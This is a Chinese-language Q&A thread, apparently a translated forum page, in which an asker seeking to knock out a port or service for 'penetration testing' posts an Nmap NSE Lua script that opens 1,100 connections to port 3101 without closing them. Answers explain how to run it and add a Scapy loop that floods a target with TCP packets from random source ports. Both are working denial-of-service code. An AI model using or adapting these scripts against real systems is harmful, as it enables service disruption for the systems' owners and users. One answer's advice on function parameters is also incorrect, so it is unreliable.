0

我需要进行渗透测试。我想获得一个脚本或一些脚本来攻击并(希望不会)通过淹没某个端口/软件来关闭它。我已经安装了 NMAP 和同事的示例脚本,是否有人向我解释该脚本并阐明如何调整它以满足我的需要?

description = [[
Connects to ports without disconnecting
]]
author =""
license = 'Same as Nmap--See http://nmap.org/book/man-legal.html'
categories = {'auth', 'intrusive'}

require('shortport')
require('stdnse')
require('strbuf')
require('math')

local soc
local catch = function() soc:close() end
local try = nmap.new_try(catch)

--portrule = shortport.port_or_service({3000, 3001, 3002, 3003, 3004, 3005,3006,3007,3008,3009, 3010, 3011, 4008, 3110}, 'client server')
--portrule = shortport.port_or_service({3000-4008}, 'client server')
portrule = shortport.port_or_service({3101}, 'client server')

action = function(host, port)
    math.randomseed( os.time() )
    local buff = ""
    soc = nmap.new_socket()
        soc:set_timeout(400000000)
    for j = 1,1100 do
                print(j)
        try(soc:connect(host.ip, port.number, port.protocol))
        --soc:close()
    end
    --print(math.random(255))
    return ""
end
4

2 回答 2

0

http://nmap.org/book/nse-api.html

尝试设置function(host='host url here', port='port number here')

于 2012-08-09T09:49:12.203 回答
0

我不确定这个脚本是不是最好的方法,但是为了运行它,你应该使用这个命令:

nmap -p 3101 --script your-script-name target

使用与 Nmap 不同的工具可能会带来更好的运气。例如,您可以使用 Scapy:

$ sudo scapy
>>> p = IP(dst="192.168.1.X") / TCP(dport=3101)
>>> while true:
...   p.sport = random.randint(1024,65535)
...   send(p)
于 2012-08-09T11:38:52.300 回答